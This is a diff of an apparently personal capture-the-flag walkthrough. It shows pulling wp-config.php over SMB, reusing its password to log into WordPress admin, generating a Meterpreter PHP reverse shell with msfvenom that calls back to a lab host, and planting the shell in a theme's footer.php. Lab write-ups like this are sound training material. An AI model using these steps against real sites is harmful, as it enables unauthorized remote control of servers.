blu0/blu0.github.io/LSAWalkthrough.md

 ![Image of SMBClient2](https://blu0.github.io/LSAWalkthrough/LSAsmbclient2.png)

-The `get` command works, so grabbed the wp-config.php file and viewed it on my system.
+The `get` command works, so I grabbed the wp-config.php file and viewed it on my system.

 ![Image of wp-config](https://blu0.github.io/LSAWalkthrough/LSAwp-config.png)

-Trying the password found in the WordPress Admin panel and what do you know, the password works.
+Trying the password found in the `wp-config.php` file in the WordPress admin panel and what do you know, the password works.

 Now it's time for time get a quick reverse shell on the machine.
-To do this I will generate a Meterpreter shell using the following command:
+To do this I will generate a Meterpreter shell using the following command (.141 is the Kali machine):

 `msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.17.141 LPORT=4444 -f raw > shell.php`

 Note: Meterpreter is not really needed, I could have tried any number of php reverse shells, but I wanted the meterpreter one for the `shell` command so that if I do something to botch my shell I can simply end the session instead of havnig to reconnect entirely.

-Once the shellcode is generated, I do a little touch up on the format (remove leading `//` and add `?>` to the end), then add to footer.php of theme.
+Once the shellcode is generated, I do a little touch up on the format (remove leading `//` and add `?>` to the end), then add to footer.php of the Wordpress theme.

 ![Image of footer](https://blu0.github.io/LSAWalkthrough/LSAfooter.png)